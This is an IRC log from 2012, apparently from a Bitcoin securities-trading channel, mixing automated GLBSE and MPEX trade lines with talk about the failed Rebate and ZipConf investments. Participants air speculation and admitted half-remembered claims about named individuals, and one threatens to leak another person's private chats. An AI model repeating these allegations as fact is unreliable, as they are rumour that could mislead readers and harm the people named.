[GLBSE] [FUTUREFUND] 1500 @ 0.00011485 = 0.1723 BTC [+] Aug 12 18:35:12 [MPEX] [F.GIGA.ETF] 700 @ 0.0011304 = 0.7913 BTC [+] Aug 12 18:41:28 [GLBSE] [ASICMINER] 23 @ 0.1 = 2.3 BTC Aug 12 18:43:06 https://bitcointalk.org/index.php?topic=97178.msg1094798#msg1094798 Aug 12 18:43:34 The number of accounts is currently at about 22000, and the largest number of people online at any given time is 126 Aug 12 18:43:41 jesus i didn't realise sr was so tiny Aug 12 18:44:29 usagi : you prolly want to put those on a blog or something of your own too Aug 12 18:44:41 tsukino.ca/cpa Aug 12 18:44:52 It will go up soon Aug 12 18:45:07 aha. what's the story with zip ? Aug 12 18:45:43 I'm not involved Aug 12 18:45:48 so I won't relay what amounts to rumor Aug 12 18:46:12 a ok Aug 12 18:46:13 But it is obvious that JRO has been neglegent in his duties to shareholders Aug 12 18:46:18 thought it was publicly known/stated Aug 12 18:46:46 For example I will not state that he isn't responding to emails, but rather point out that someone else said that Aug 12 18:46:58 And a number of other things.. Check the rebate and zip.a threads Aug 12 18:47:00 thats all I know Aug 12 18:47:45 Kind of weird because he is well known in the SF community, I hear people he doesn't know stop him on the street all the time asking him about his businesses Aug 12 18:47:55 I'm sure it will be resolved soon Aug 12 18:48:20 [11:23:00] wait Diablo-D3 runs a fund ? thought it was a straight miner. Aug 12 18:48:23 I run a company Aug 12 18:48:51 maybe the guy got the flu or w/e Aug 12 18:48:56 its not a fund, although its been virtually acting like that for the short term Aug 12 18:48:58 Diablo-D3 as in, diversified ? Aug 12 18:49:14 diversified enough Aug 12 18:49:20 its hard to be when there isnt many options out there Aug 12 18:49:41 if you want a diversified fund, go buy usagi's bmf instead Aug 12 18:49:44 or nyan Aug 12 18:49:54 im trying to recall what the relation was between zip.x and bdk Aug 12 18:50:04 Nothing apparently Aug 12 18:50:13 Diablo-D3 just sorta trying to keep track of what's going on :p Aug 12 18:50:15 BDK is Kludge's bank Aug 12 18:50:19 yeah. Aug 12 18:50:24 https://bitcointalk.org/index.php?topic=84363.0 Aug 12 18:50:28 mircea_popescu: https://bitcointalk.org/index.php?topic=77469 Aug 12 18:50:39 mircea_popescu: thats DMC's big plan Aug 12 18:51:17 Happy Dividend Day! haha Aug 12 18:51:38 Diablo-D3 you ever seen smickles' reporting sheets ? Aug 12 18:52:04 [GLBSE] [NYAN.C] 2 @ 0.99999999 = 2 BTC [-] Aug 12 18:52:53 lol 2 @ 0.99999999 = 2 BTC that's cute :D Aug 12 18:53:30 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 18:53:39 I dont pay attention to them Aug 12 18:54:02 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 18:54:14 Diablo-D3 i thought it was a pretty good adaptation of gaap for bitcoin assets. just saying/ Aug 12 18:54:32 it probably is Aug 12 18:55:04 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 18:55:13 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 18:55:32 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 18:56:10 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 18:56:19 Who would sell NYAN at 0.99999 given we pay 8.6% a week Aug 12 18:56:31 They must need it for drugs or something Aug 12 18:56:43 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 18:57:44 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 18:58:02 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 18:58:25 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 18:58:26 usagi well they got the dividend already right ? Aug 12 18:59:18 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 18:59:51 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:00:13 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:00:49 [GLBSE] [NYAN.C] 3 @ 0.99999999 = 3 BTC [-] Aug 12 19:00:50 [GLBSE] [NYAN.C] 15 @ 1 = 15 BTC [+] Aug 12 19:00:57 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:01:39 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:01:51 [GLBSE] [TYGRR.BOND-P] 1 @ 1.04 BTC [+] Aug 12 19:02:03 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:02:14 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:03:05 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:03:06 lol @ forum hate. what's p4 got against you Diablo-D3 ? Aug 12 19:03:36 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:04:02 where Aug 12 19:04:12 oh p4man? Aug 12 19:04:17 p4man is a troll Aug 12 19:04:30 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:05:03 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:05:16 yeah hes a troll Aug 12 19:05:22 I let him sink himself Aug 12 19:05:28 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:05:36 people may throw their money at Pirate or BFL instead because they don't know any better. << what's the problem with bfl ?! Aug 12 19:05:49 aren't they supposed to deliver like 1mn worth of fpga/asics this year to various ppl ? Aug 12 19:05:51 [GLBSE] [GIGAMINING] 6 @ 1.14099999 = 6.846 BTC [+] Aug 12 19:05:52 [GLBSE] [GIGAMINING] 4 @ 1.14109999 = 4.5644 BTC [+] Aug 12 19:05:53 no one think BFL is real Aug 12 19:05:58 what ?! Aug 12 19:06:02 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 12 19:06:09 well their asic shit Aug 12 19:06:17 their fpga shit is mildly real Aug 12 19:06:18 dude i know people with 10-100k usd in preorders ? Aug 12 19:06:26 yeah, I know those same people Aug 12 19:06:29 I feel sorry for them Aug 12 19:06:39 well maybe not exactly the same but yeah, many well known too. Aug 12 19:06:52 heck, wasn't giga doing a large buy for one ? Aug 12 19:07:09 yup Aug 12 19:07:13 giga might have the largets buy Aug 12 19:07:16 what thread, D Aug 12 19:07:24 usagi: DMC's Aug 12 19:07:30 possibly, yea, since it's not clear exactly how many he;'s taking or what. Aug 12 19:07:55 well i'll tell you, if bfl flakes out that'll be some pretty turmoily news. Aug 12 19:07:56 ZETA-MINING: dividends for week 32.2012 paid Aug 12 19:09:30 there is a point raised there, troll or no troll. the question with mining assets is if their dividends meet their depreciation rates Aug 12 19:09:38 this is a very disputable issue. Aug 12 19:09:41 what was the BTC price when the BFL (or is it BFFL :) hysteria started? Aug 12 19:09:55 EskimoBob when do you count it to have started ? january ? Aug 12 19:10:12 [GLBSE] [GOLD] 2 @ 0.01 = 0.02 BTC [+] Aug 12 19:10:25 EskimoBob: btc basically doubled. Aug 12 19:12:23 Diablo-D3 i doubt if btc goes back under 10 this year tbh. Aug 12 19:13:06 but just ftr, the first 1mn start-up is kinda too late, mpex is ~3.5mn atm. Aug 12 19:15:25 [MPEX] [F.GIGA.ETF] 4900 @ 0.0011304 = 5.539 BTC [+] Aug 12 19:16:45 I am planning to do another ASICMINER bulk order, if anyone is interested or want to join our skype group to talk to the development crew, then pm me :) Aug 12 19:18:15 DeaDTerra what do you know about the entire ownes/zip thing ? Aug 12 19:18:40 i'm asking because "Hello, I am sorry that there has been no official thread so far JRO the owner of Rebate has not had time to post one as he has a lot to do with other projects, Kronor etc." Aug 12 19:31:34 [MPEX] [S.BVPS] 500 @ 0.00351528 = 1.7576 BTC [-] Aug 12 19:31:52 DeaDTerra: are they close to being done? Aug 12 19:34:01 [GLBSE] [BIB.PIRATE] 1 @ 1.03499934 BTC [-] Aug 12 19:34:17 [GLBSE] [SYNERGY] 5 @ 0.1959 = 0.9795 BTC [+] Aug 12 19:36:09 [GLBSE] [BIB.PIRATE] 2 @ 1.04 = 2.08 BTC [+] Aug 12 19:38:19 [GLBSE] [GIPPT] 10 @ 1.248 = 12.48 BTC [+] Aug 12 19:39:06 [GLBSE] [YABMC] 13 @ 0.1242 = 1.6146 BTC [-] Aug 12 19:39:29 https://bitcointalk.org/index.php?topic=83784.msg1092788#msg1092788 Aug 12 19:39:45 ok, this is possibly the most unprofessional thing i ever read in my life. WHAT ?! Aug 12 19:40:04 [GLBSE] [YABMC] 1 @ 0.1242 BTC [-] Aug 12 19:40:12 :D Aug 12 19:40:52 dude, it boggles. "i had an asset made in my name on my website and then i got like 1k btc of i dunno how many raised cause i didn't care and nao i shall give people whatever i have left ty all for being pros" Aug 12 19:40:54 what the fuck. Aug 12 19:41:21 he is unserious. Aug 12 19:42:23 mircea_popescu: more like 2 months ago or so Aug 12 19:43:20 EskimoBob well why ? i mean giga was doing raffles back in april or w/e ? Aug 12 19:45:12 [GLBSE] [NYAN.C] 20 @ 1 = 20 BTC [+] Aug 12 19:45:50 [GLBSE] [DI.BFLSC.FAIL] 500 @ 0.001 = 0.5 BTC [+] Aug 12 19:46:29 [GLBSE] [GIGAMINING] 4 @ 1.14099999 = 4.564 BTC [-] Aug 12 19:47:25 sorry I was eating dinner Aug 12 19:47:30 let me read the log Aug 12 19:47:55 DeaDTerra what do you know about the entire ownes/zip thing ? In what sense what do I know?, I know most things about it. Aug 12 19:48:45 [GLBSE] [PUREMINING] 1 @ 0.15439999 BTC [+] Aug 12 19:49:14 DeaDTerra: how close are they to their goal? Aug 12 19:50:52 ZipConf has a major flaw/bug in the system, it's unknown when or if it will ever be fixed, JRO has said that it might not be able to be launched publically but it can instead run as a network with only trusted parties on it. Note that I am parafrasing Aug 12 19:51:29 Rebate is up and running but is not as profitable as it needs to be and I doubt it will be as profitable, as long as it's not integrated to ZipConf and it doesn't have a proper development team behind it. Aug 12 19:51:43 rebate is bug.com Aug 12 19:51:46 My opinion is to reach a deal with JRO of a slow payback to the investors. Aug 12 19:52:12 [GLBSE] [TEEK.PPT] 7 @ 1.8 = 12.6 BTC [-] Aug 12 19:54:09 [GLBSE] [BITBOND] 9 @ 0.37479999 = 3.3732 BTC [+] Aug 12 19:55:05 [GLBSE] [BITBOND] 6 @ 0.37489999 = 2.2494 BTC [+] Aug 12 19:59:22 [GLBSE] [OBSI.HRPT] 11 @ 0.1011102 = 1.1122 BTC [-] Aug 12 19:59:23 [GLBSE] [OBSI.HRPT] 38 @ 0.1011101 = 3.8422 BTC [-] Aug 12 19:59:25 [GLBSE] [OBSI.HRPT] 10 @ 0.10111 = 1.0111 BTC [-] Aug 12 19:59:26 [GLBSE] [OBSI.HRPT] 514 @ 0.1011 = 51.9654 BTC [-] Aug 12 19:59:26 [GLBSE] [OBSI.HRPT] 1000 @ 0.101 = 101 BTC [-] Aug 12 19:59:27 [GLBSE] [OBSI.HRPT] 500 @ 0.1008 = 50.4 BTC [-] Aug 12 19:59:29 [GLBSE] [OBSI.HRPT] 500 @ 0.1007 = 50.35 BTC [-] Aug 12 19:59:30 [GLBSE] [OBSI.HRPT] 800 @ 0.1006 = 80.48 BTC [-] Aug 12 19:59:31 [GLBSE] [OBSI.HRPT] 1000 @ 0.10055 = 100.55 BTC [-] Aug 12 19:59:32 [GLBSE] [OBSI.HRPT] 100 @ 0.1005 = 10.05 BTC [-] Aug 12 19:59:33 [GLBSE] [OBSI.HRPT] 300 @ 0.1004 = 30.12 BTC [-] Aug 12 19:59:34 [GLBSE] [OBSI.HRPT] 200 @ 0.1003 = 20.06 BTC [-] Aug 12 19:59:35 [GLBSE] [OBSI.HRPT] 100 @ 0.1002 = 10.02 BTC [-] Aug 12 19:59:35 [GLBSE] [OBSI.HRPT] 100 @ 0.1001 = 10.01 BTC [-] Aug 12 19:59:37 [GLBSE] [OBSI.HRPT] 20 @ 0.100001 = 2 BTC [-] Aug 12 19:59:38 [GLBSE] [OBSI.HRPT] 18 @ 0.100001 = 1.8 BTC [-] Aug 12 19:59:39 [GLBSE] [OBSI.HRPT] 500 @ 0.1000001 = 50.0001 BTC [-] Aug 12 19:59:40 [GLBSE] [OBSI.HRPT] 72 @ 0.1 = 7.2 BTC [-] Aug 12 19:59:41 [GLBSE] [OBSI.HRPT] 60 @ 0.1 = 6 BTC [-] Aug 12 19:59:42 [GLBSE] [OBSI.HRPT] 80 @ 0.1 = 8 BTC [-] Aug 12 19:59:43 [GLBSE] [OBSI.HRPT] 600 @ 0.1 = 60 BTC [-] Aug 12 19:59:44 [GLBSE] [OBSI.HRPT] 130 @ 0.1 = 13 BTC [-] Aug 12 19:59:45 [GLBSE] [OBSI.HRPT] 70 @ 0.1 = 7 BTC [-] Aug 12 19:59:45 [GLBSE] [OBSI.HRPT] 60 @ 0.1 = 6 BTC [-] Aug 12 19:59:46 [GLBSE] [OBSI.HRPT] 80 @ 0.1 = 8 BTC [-] Aug 12 19:59:47 [GLBSE] [OBSI.HRPT] 105 @ 0.1 = 10.5 BTC [-] Aug 12 19:59:48 [GLBSE] [OBSI.HRPT] 64 @ 0.1 = 6.4 BTC [-] Aug 12 19:59:50 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 12 19:59:51 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [-] Aug 12 19:59:52 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 12 19:59:53 [GLBSE] [OBSI.HRPT] 190 @ 0.1 = 19 BTC [-] Aug 12 19:59:53 [GLBSE] [OBSI.HRPT] 6 @ 0.1 = 0.6 BTC [-] Aug 12 19:59:54 [GLBSE] [OBSI.HRPT] 10 @ 0.1 = 1 BTC [-] Aug 12 19:59:55 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 12 19:59:56 [GLBSE] [OBSI.HRPT] 900 @ 0.1 = 90 BTC [-] Aug 12 19:59:57 [GLBSE] [OBSI.HRPT] 300 @ 0.1 = 30 BTC [-] Aug 12 19:59:58 [GLBSE] [OBSI.HRPT] 9 @ 0.1 = 0.9 BTC [-] Aug 12 19:59:59 [GLBSE] [OBSI.HRPT] 21 @ 0.1 = 2.1 BTC [-] Aug 12 20:00:36 DeaDTerra so then as conjecture, the problem they were trying to solve solved them, people got disheatened, took a nervous break-down, will in principle be back to unwind soonish Aug 12 20:00:42 something like that ? Aug 12 20:02:51 "From what I've learned, those around him (not going to drop names here) have been covering for him for some time. To resolve a situation requires at the least basic communication, of which we've not seen for months." Aug 12 20:02:57 JRO is moving on to other projects and is becoming hard to communcate with. Aug 12 20:03:00 this on the other hand sounds extremely shakaru-esque. Aug 12 20:03:18 [GLBSE] [BITBOND] 3 @ 0.3899 = 1.1697 BTC [+] Aug 12 20:03:51 when rebate couldn't show the results the shareholders wanted I pushed for a buy back and as JRO didn't respond and I haven't talked to him in a week Nefario decided to shut down the accounts, to investigate what was going on. Aug 12 20:04:00 [GLBSE] [OBSI.HRPT] 450 @ 0.1 = 45 BTC [-] Aug 12 20:04:07 aha. Aug 12 20:04:30 Some say he's currently sick, I don't know I just want this solved and get back my BTC Aug 12 20:04:32 http://www.thebitcointrader.com/2012/05/bitcoins-hogwarts-san-francisco-tech.html this would be related maybe ? Aug 12 20:05:29 [GLBSE] [MOVETO.FUND] 1 @ 1.065 BTC [-] Aug 12 20:06:01 it is Aug 12 20:06:10 [GLBSE] [YARR] 1 @ 1.55 BTC [+] Aug 12 20:06:12 [GLBSE] [YARR] 39 @ 1.51 = 58.89 BTC [-] Aug 12 20:06:16 it's his new Project that he has been spending time on instead of cleaning up Rebate and ZipConf. Aug 12 20:06:31 That's why I don't think he will make a run or something silly like that. Aug 12 20:06:49 Because he is heavily invested in other Bitcoin related projects. Aug 12 20:06:58 well srsly, if this guy is short like 5k btc = 50k usd and jared kenna contributed about the same that'd be all their working capital involed there. Aug 12 20:07:04 did tradehill pay out everyone in the end ? Aug 12 20:07:49 [GLBSE] [BIF.BTCST.PPT] 8 @ 1.03 = 8.24 BTC [+] Aug 12 20:08:09 [GLBSE] [BIB.PIRATE] 1 @ 1.03499932 BTC [-] Aug 12 20:08:13 [GLBSE] [OBSI.HRPT] 3 @ 0.1 = 0.3 BTC [-] Aug 12 20:09:14 [GLBSE] [BIF.BTCST.PPT] 30 @ 1.035 = 31.05 BTC [+] Aug 12 20:10:22 [GLBSE] [YARR] 3 @ 1.51 = 4.53 BTC [-] Aug 12 20:10:23 [GLBSE] [YARR] 7 @ 1.492 = 10.444 BTC [-] Aug 12 20:11:50 DeaDTerra: to you know what language they used to write ZipConf? Aug 12 20:12:13 [GLBSE] [BIF.BTCST.PPT] 35 @ 1.04 = 36.4 BTC [+] Aug 12 20:13:21 "Matthew, I will not entertain your personal circus since I do not consider you a serious person, and much less an unbiassed one" Aug 12 20:13:28 lmao the forums are such a lulzy goldmine. Aug 12 20:14:14 No I do not know what language it was writen in Aug 12 20:14:23 I helped with IPOs, and idea + documents Aug 12 20:14:38 I had nothing to do with the development team Aug 12 20:15:08 i think it's maybe time this soupy chummyness comes to an end. Aug 12 20:15:21 1. everyone is friends with everyone, covers up for people, then we end up shakaru'd. Aug 12 20:15:39 2. everyone's involvement is unclear especialyl as to limits till the point something goes wrong. Aug 12 20:15:45 [GLBSE] [OBSI.HRPT] 500 @ 0.1 = 50 BTC [-] Aug 12 20:15:51 DeaDTerra: if the code is worth anything and you guys wan someone else to finish it up, I can probably help (I am not a programmer) to get it cleaned up Aug 12 20:15:52 people should prolly draw much sharper and clearer boundries Aug 12 20:15:53 I am quite pissed at JRO, as he promised me that he would fix this, all of this. Both ZIP.A and Rebate were to be paid back or the service were to go up and start generating profit. So I bought him time and what does he give me, more silence and bullshit. sigh... Aug 12 20:16:16 why'd you buy him time ? Aug 12 20:16:24 EskimoBob no offense but you should be kept far away from production code Aug 12 20:16:43 I am not a programmer, dip shit :) Aug 12 20:16:48 See? Aug 12 20:16:53 I have a way of knowing such things. Aug 12 20:17:16 He said that he has investors coming into 20Missions and that he would set his development team on fixing the project. I believed him for the first couple of weeks. Aug 12 20:17:18 did I say I'll write the code? Aug 12 20:17:27 JRO will not be very happy if his info gets posted on the bitcoin credit agency Aug 12 20:17:45 since then I have been pushing for a wrap up/buy back of this whole thing but as he's very very slow at getting back if he gets back to you at all that is, it's very hard to negotiate. Aug 12 20:18:11 I have tried to get contact with him, as he plans to run Bitcoin related projects in the future. It will not work out unless he cleans this mess up Aug 12 20:18:25 "his development team". sigh. there's not five developers half competent into bitcoin atm, what "team" ? Aug 12 20:18:30 everyone has a team. Aug 12 20:18:44 If you have a team you are probably incompetent hehe Aug 12 20:18:51 I don't see the need for a team Aug 12 20:18:53 Eric,vlad,alberto is those I know of that has worked on his projects. Aug 12 20:19:18 vlad? Aug 12 20:19:27 the bitcoin billionaire guy. Aug 12 20:19:27 usagi many of hte better services were in fact a single man endeavour or close thereby, like say bitcoincharts. Aug 12 20:19:35 Yes it was stupid to believe him, but he's very convincing plus when you have a lot at stake your brain wants to believe whats being promised. Aug 12 20:19:46 DeaDTerra that's exactly how people get burned. Aug 12 20:19:59 wait what, marachenko is invlolved here? Aug 12 20:20:09 and this misplaced loyalty creating a fog around things is very detrimental to business and the btc. Aug 12 20:20:18 Vlad worked on kronos, and I think he was on the development team Aug 12 20:20:36 [GLBSE] [TYGRR.BOND-P] 1 @ 1.04 BTC [+] Aug 12 20:20:43 aha Aug 12 20:20:48 Vladimir Alexandrovich Marchenko, the physicist ?! Aug 12 20:21:01 Well having that said it's not like I had a tin foil hat on me saying he's going to do this and this because he said so. I questioned him and tried to get him on the correct path several times. Aug 12 20:21:18 I might be wrong xD this is all from my memory, let me check the skype log Aug 12 20:23:37 sure - lets another man and a dog develop something and when he gets "sick" and walks... you have a assload of broken code :) Aug 12 20:23:49 nvm I am going to stop name dropping it was months ago, I can't remember Aug 12 20:24:24 Tbh this is how I think the whole rebate thing went down Aug 12 20:24:52 [GLBSE] [FPGAMINING] 1 @ 0.86 BTC [+] Aug 12 20:25:09 [GLBSE] [BITBOND] 2 @ 0.3795 = 0.759 BTC [-] Aug 12 20:25:10 [GLBSE] [BITBOND] 4 @ 0.3799 = 1.5196 BTC [+] Aug 12 20:25:12 [GLBSE] [BITBOND] 8 @ 0.38 = 3.04 BTC [+] Aug 12 20:25:13 [GLBSE] [BITBOND] 10 @ 0.39 = 3.9 BTC [+] Aug 12 20:25:14 [GLBSE] [BITBOND] 12 @ 0.39 = 4.68 BTC [+] Aug 12 20:25:14 [GLBSE] [BITBOND] 14 @ 0.3999999 = 5.6 BTC [+] Aug 12 20:25:16 [GLBSE] [BITBOND] 100 @ 0.4 = 40 BTC [+] Aug 12 20:25:17 [GLBSE] [BITBOND] 10 @ 0.4139 = 4.139 BTC [+] Aug 12 20:25:42 JRO planned to help Alberto develop it and he planned to make sure it was profitable and went sucessful. But after the IPO he and alberto had a conflict and JRO dissapread for a long time. A couple of weeks in fact. Then he comes back he has moved on to 20Misisons and Kronos, and now avoids Rebate etc. So I think he originally planned to run it but hen jumped off after the fight with Aug 12 20:25:42 Alberto. Aug 12 20:25:56 Now the question is wheres the rest of the money from the IPO Aug 12 20:26:25 [GLBSE] [BITBOND] 2 @ 0.469 = 0.938 BTC [+] Aug 12 20:26:59 [MPEX] [F.GIGA.ETF] 10526 @ 0.00111986 = 11.7876 BTC [-] Aug 12 20:27:00 [MPEX] [F.GIGA.ETF] 7900 @ 0.00110266 = 8.711 BTC [-] Aug 12 20:27:02 [MPEX] [F.GIGA.ETF] 1574 @ 0.00109258 = 1.7197 BTC [-] Aug 12 20:27:38 that's quite possible as an explanation Aug 12 20:27:40 This is why I *always* put arbitration agreements in contracts Aug 12 20:28:02 usagi contracts are kinda useless in start-ups in my experience. Aug 12 20:28:05 I hope you have learned to do the same from now on, DT :) Aug 12 20:28:21 they're like marriage contracts. start-ups work when the people are having not sex-sex, but start-up sex. Aug 12 20:28:52 in about 2,5 hours dividend is paid. Still some shares to sell https://glbse.com/asset/view/PGM Aug 12 20:28:53 Eric and Vladimir are -working- on Kronos, Aug 12 20:28:54 everyone else is managing Aug 12 20:28:54 I have no soul. Sorry, can't follow Aug 12 20:29:18 usagi just saying, if people have a falling out contracts don't help at this level. Aug 12 20:29:53 Could not connect to remote server Aug 12 20:29:53 You tried to access the address http://kronos.io/, which is currently unavailable. Aug 12 20:30:08 that doesn't look too good ? Aug 12 20:30:46 If JRO doesn't respond soon then I will go through all skype convo I have ever been in with him and release all the relevant info Aug 12 20:30:57 all his projects, all his secrets, all his new and up and coming once as well. Aug 12 20:31:05 Oh yes they do Aug 12 20:31:34 Though first I want Nefario to call him repeated times, so it's obvious he's not planning on taking responsibility Aug 12 20:31:37 check this one out http://www.tsukino.ca/cpa/customers/account-16/ Aug 12 20:31:52 F. DISPUTE RESOLUTION Aug 12 20:31:52 1. Any controversy or claim arising out of or relating to this Aug 12 20:31:52 contract, or the breach of this contract, shall be settled Aug 12 20:31:52 by binding internet arbitration at judge.me in accordance Aug 12 20:31:52 with the judge.me arbitration agreement. The arbitrator's Aug 12 20:31:54 decision shall be final and legally binding and judgment may Aug 12 20:31:56 be entered thereon. Aug 12 20:32:01 [MPEX] [S.MPOE] 2100 @ 0.00035218 = 0.7396 BTC [-] Aug 12 20:32:28 I guarantee you I would go after someone that did that to me if they signed a contract like that Aug 12 20:33:40 [GLBSE] [BITBOND] 1 @ 0.465 BTC [-] Aug 12 20:36:48 usagi : point is, so you go after them. so ? Aug 12 20:37:56 So we get a judgement Aug 12 20:37:58 and we take his car Aug 12 20:38:05 repo Aug 12 20:38:07 Or whatever Aug 12 20:38:10 dunno lol Aug 12 20:38:31 operation REPO lol Aug 12 20:38:36 I'm not joking Aug 12 20:38:45 These are serious contracts Aug 12 20:39:00 I know, its fckd up Aug 12 20:39:01 usagi yes man, but my point is! Aug 12 20:39:13 it still won't fix the company. so you get a car. big deal. you weren't into this to get a car. Aug 12 20:39:21 Hehe Aug 12 20:39:29 Well that's life Aug 12 20:39:29 there;'s a reason start-ups rarely sue founders, even in sv. Aug 12 20:39:45 coercion doesn't work for creativity. Aug 12 20:40:17 Well I am not connected to this really Aug 12 20:41:00 luckly me neither Aug 12 20:45:31 [GLBSE] [PUREMINING] 1 @ 0.15439999 BTC [+] Aug 12 20:47:33 any news from nefario? When will he fix the exchange? Aug 12 20:48:20 glbse is broke? Aug 12 20:48:35 glbse is an exchange ? :D Aug 12 20:48:56 hm wait seems like I have gotten a message from JRO Aug 12 20:49:03 wtf skype didn't notify me Aug 12 20:49:15 10 August he responded me Aug 12 20:49:25 [GLBSE] [BITBOND] 4 @ 0.469 = 1.876 BTC [+] Aug 12 20:50:35 mircea_popescu: was that a surprise to you? Aug 12 20:50:48 hm, why has this not been posted online. And does Nefario have this hmm Aug 12 20:50:50 i still don't believe it. Aug 12 20:51:21 seems more like a free to play mmo. Aug 12 20:51:30 [MPEX] [F.GIGA.ETF] 4379 @ 0.00109258 = 4.7844 BTC [-] Aug 12 20:51:32 [MPEX] [F.GIGA.ETF] 4891 @ 0.001091 = 5.3361 BTC [-] Aug 12 20:51:33 [MPEX] [F.GIGA.ETF] 5088 @ 0.00109056 = 5.5488 BTC [-] Aug 12 20:51:37 [GLBSE] [PUREMINING] 1 @ 0.15439999 BTC [+] Aug 12 20:51:58 DeaDTerra and the msg is? Aug 12 20:52:04 DeaDTerra: what did he tell you? Aug 12 20:52:27 Dude this is scary i remember reading this, but I can't remember when, I must have been so fuckign tired xD Aug 12 20:53:04 hm that was probably the night I was up to 4am trying to fic this whole thing. Can't post this online unfortunatly, though if Nefario doesn't have it I should send it to him Aug 12 20:53:18 Why can't you post it? Aug 12 20:53:31 theres less than 20k shares to go for asicminer Aug 12 20:53:57 to summarize, he explains the situation out of his eyes, what happened etc. Then he says he has been busy working on some other projects which I am not sure if I can mention and 20Misisons. To be able to settle his debt. Aug 12 20:54:19 I'm actively seeking the assistance of a few friends and past associates to raise the money needed to retire the BitcoinRebate debacle, and retire all GLBSE obligations. Since Alberto (Bit Day Trade) has no assets remaining, or intent to pay, I'm on the hook entirely to retire all GLBSE obligations. I accept this, and I will sell my good kidney (if need be) to make that happen. Aug 12 20:54:20 In the meantime, I've been working hard to make a real world retail digital currency exchange happen in San Francisco, which would be a prime customer of the ZipConf back end - i.e. multi market, unified orderbook and best price discovery, for the purpose of buying and selling bitcoin, with an eye toward providing other digital currencies (Linden Dollars, In game currencies) in the Aug 12 20:54:20 future. Aug 12 20:54:20 To everyone who's affected: I'm incredibly embarassed, and I'm deeply sorry. I still have hope for the future. I can't be certain that it will work out for the best, but I'm going to continue to try until my last breath. Aug 12 20:54:20 Jonathan Ryan Owens Aug 12 20:54:21 his debt with the zip etc you mean ? Aug 12 20:54:24 Ahh so the money is gone. Aug 12 20:54:27 rebate Aug 12 20:55:03 so yea Aug 12 20:55:09 i think hes planning on buying back Aug 12 20:55:25 he just needs time to raise capital, but then again why has he not responded to Nefario Aug 12 20:55:49 anyways, I think I am just going to stop talking about this xD, half of the time I remember incorectly and the other half I don't remember at all :P Aug 12 20:56:12 In case of a JRO default I will post all relevent logs on the forums so you can see for yourself if not then, I am very happy that things could work out. Aug 12 20:56:15 DeaDTerra out Aug 12 20:57:21 this sounds so much like j. kenna. Aug 12 20:59:17 usagi you're prolly on solid ground to mark the respective lines as a complete loss in your book Aug 12 21:02:00 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [-] Aug 12 21:04:11 [GLBSE] [ZETA-MINING] 19 @ 0.17 = 3.23 BTC [+] Aug 12 21:08:27 [GLBSE] [RAREEARTH] 11 @ 0.00997999 = 0.1098 BTC [+] Aug 12 21:10:33 [MPEX] [O.BTCUSD.C090T] 180 @ 0.31492428 = 56.6864 BTC [+] Aug 12 21:11:19 [GLBSE] [TYGRR.BOND-P] 4 @ 1.0363 = 4.1452 BTC [-] Aug 12 21:11:20 [GLBSE] [TYGRR.BOND-P] 1 @ 1.0362 BTC [-] Aug 12 21:11:58 [GLBSE] [OBSI.1MHS] 30 @ 0.0999 = 2.997 BTC [-] Aug 12 21:16:39 anyhow Aug 12 21:16:42 Im going to bed Aug 12 21:16:53 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 12 21:18:23 [GLBSE] [PPT.E] 14 @ 1.18 = 16.52 BTC [-] Aug 12 21:19:12 [GLBSE] [TYGRR.BOND-B] 1 @ 0.1 BTC [+] Aug 12 21:19:36 [GLBSE] [OBSI.HRPT] 5 @ 0.1 = 0.5 BTC [-] Aug 12 21:19:45 [GLBSE] [OBSI.HRPT] 163 @ 0.1 = 16.3 BTC [-] Aug 12 21:20:01 [GLBSE] [NYAN.C] 20 @ 1 = 20 BTC [+] Aug 12 21:22:23 good night D Aug 12 21:22:37 [GLBSE] [BITBOND] 5 @ 0.4381 = 2.1905 BTC [-] Aug 12 21:24:42 maybe he's going to bed a gorgeous blonde. Aug 12 21:26:13 [GLBSE] [ASICMINER] 1 @ 0.1 BTC Aug 12 21:30:06 [GLBSE] [NYAN.C] 100 @ 1 = 100 BTC [+] Aug 12 21:32:34 [GLBSE] [OBSI.HRPT] 441 @ 0.1 = 44.1 BTC [-] Aug 12 21:41:29 jro taking the money and running? if only saw that coming... Aug 12 21:41:44 sorry.. dont mean to rub it in... Aug 12 21:43:00 Chaang-Noi you saw it coming ? Aug 12 21:43:15 i posted in the thread about jro and matthew doing this stuff months ago Aug 12 21:43:17 [GLBSE] [GIGAMINING] 4 @ 1.1323 = 4.5292 BTC [-] Aug 12 21:43:18 